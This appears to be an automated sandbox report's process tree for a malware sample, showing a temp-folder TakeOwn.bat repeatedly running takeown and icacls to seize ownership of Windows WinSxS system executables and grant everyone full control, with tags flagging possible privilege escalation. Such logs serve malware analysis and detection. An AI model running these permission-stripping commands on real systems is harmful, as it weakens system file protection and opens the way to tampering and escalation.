C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\r\PerceptionSimulationInput.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\r\PerceptionSimulationInput.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\r\PerceptionSimulationInput.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.1_none_5c82be53abe61670\PnPUnattend.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.1_none_5c82be53abe61670\PnPUnattend.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.1_none_5c82be53abe61670\PnPUnattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\f\PnPUnattend.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\f\PnPUnattend.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\f\PnPUnattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\PnPUnattend.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\PnPUnattend.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\PnPUnattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\r\PnPUnattend.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\r\PnPUnattend.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsnonwinpeplugin_31bf3856ad364e35_10.0.19041.572_none_846686e46b73c8e3\r\PnPUnattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-packageinspector_31bf3856ad364e35_10.0.19041.1_none_207315525e8d1734\PackageInspector.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-packageinspector_31bf3856ad364e35_10.0.19041.1_none_207315525e8d1734\PackageInspector.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-packageinspector_31bf3856ad364e35_10.0.19041.1_none_207315525e8d1734\PackageInspector.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.19041.1_none_a2c8d19f92a1cc22\PkgMgr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.19041.1_none_a2c8d19f92a1cc22\PkgMgr.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.19041.1_none_a2c8d19f92a1cc22\PkgMgr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\ApproveChildRequest.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\ApproveChildRequest.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\ApproveChildRequest.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\f\ApproveChildRequest.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\f\ApproveChildRequest.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\f\ApproveChildRequest.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\r\ApproveChildRequest.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\r\ApproveChildRequest.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.1052_none_073e2a212d1697e6\r\ApproveChildRequest.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\ApproveChildRequest.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\ApproveChildRequest.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\ApproveChildRequest.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\f\ApproveChildRequest.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\f\ApproveChildRequest.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\f\ApproveChildRequest.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\r\ApproveChildRequest.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\r\ApproveChildRequest.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-parentalcontrols-ots_31bf3856ad364e35_10.0.19041.84_none_8a067925a612632c\r\ApproveChildRequest.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\f\pcwrun.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\f\pcwrun.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\f\pcwrun.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\pcwrun.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\pcwrun.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\pcwrun.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\r\pcwrun.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\r\pcwrun.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1266_none_69f1a169b4d96a7c\r\pcwrun.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1_none_ab1cdb679f059ace\pcwrun.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1_none_ab1cdb679f059ace\pcwrun.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pcwdiagnostic_31bf3856ad364e35_10.0.19041.1_none_ab1cdb679f059ace\pcwrun.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\perfmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\perfmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\perfmon.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\resmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\resmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\resmon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.746_none_7a0308f7ffc334d5\perfmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.746_none_7a0308f7ffc334d5\perfmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.746_none_7a0308f7ffc334d5\perfmon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.746_none_7a0308f7ffc334d5\resmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.746_none_7a0308f7ffc334d5\resmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.746_none_7a0308f7ffc334d5\resmon.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\f\PickerHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\f\PickerHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\f\PickerHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\PickerHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\PickerHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\PickerHost.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\r\PickerHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\r\PickerHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\r\PickerHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1_none_639e78e5edb8f409\PickerHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1_none_639e78e5edb8f409\PickerHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1_none_639e78e5edb8f409\PickerHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\PATHPING.EXE"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\PATHPING.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\PATHPING.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\PING.EXE"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\PING.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\PING.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\TRACERT.EXE"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\TRACERT.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.19041.1_none_5f22b28b2f384ed0\TRACERT.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.1_none_09dd65fa3d1bcf14\PktMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.1_none_09dd65fa3d1bcf14\PktMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.1_none_09dd65fa3d1bcf14\PktMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\f\PktMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\f\PktMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\f\PktMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\PktMon.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\PktMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\PktMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\r\PktMon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\r\PktMon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pktmon-setup_31bf3856ad364e35_10.0.19041.928_none_31fd477afc7b8278\r\PktMon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pnphotplugui_31bf3856ad364e35_10.0.19041.1_none_9ed23f0cea1bf54e\DeviceEject.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pnphotplugui_31bf3856ad364e35_10.0.19041.1_none_9ed23f0cea1bf54e\DeviceEject.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pnphotplugui_31bf3856ad364e35_10.0.19041.1_none_9ed23f0cea1bf54e\DeviceEject.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\f\pnputil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\f\pnputil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\f\pnputil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\pnputil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\pnputil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\pnputil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\r\pnputil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\r\pnputil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1151_none_7233d7a171b1272a\r\pnputil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1_none_b354d0155be50ce9\pnputil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1_none_b354d0155be50ce9\pnputil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-pnputil_31bf3856ad364e35_10.0.19041.1_none_b354d0155be50ce9\pnputil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.1_none_1f070c37a19029ff\powershell.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.1_none_1f070c37a19029ff\powershell.exe"3⤵
-
-
